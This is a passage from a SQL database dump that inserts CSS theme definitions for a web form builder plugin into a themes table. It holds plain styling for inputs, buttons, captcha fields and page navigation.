#dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #6C005E;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #6C005E;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #6C005E;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #6C005E;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #6C005E;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #6C005E;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #6C005E;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(3, 'Theme 01 black', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #000;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #000;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #000;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #000;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #000;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 1);
INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(4, 'Theme 01 transparent (black button)', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nborder-radius: 5px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	